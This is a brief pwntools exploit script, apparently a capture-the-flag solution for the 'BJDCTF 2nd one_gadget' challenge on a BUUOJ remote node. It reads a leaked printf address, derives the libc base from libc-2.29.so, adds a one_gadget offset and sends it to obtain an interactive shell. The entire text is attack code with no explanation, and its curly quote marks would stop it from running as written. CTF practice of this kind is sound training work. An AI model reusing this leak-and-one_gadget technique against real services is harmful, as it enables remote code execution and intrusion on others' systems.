[BJDCTF 2nd]one_gadget

from pwn import *

#r=process(‘./one_gadget‘)
r=remote(‘node3.buuoj.cn‘,26604)
libc=ELF(‘./libc-2.29.so‘)

r.recvuntil("0x")
print_addr=int(r.recvn(12),16)
print(‘print_addr:‘, hex(print_addr))
libc_base=print_addr-libc.symbols[‘printf‘]

one_gadget =[0xe237f,0xe2383,0xe2386,0x106ef8]
shell=libc_base+one_gadget[3]

r.recvuntil(‘Give me your one gadget:‘)
r.sendline(str(shell))

r.interactive()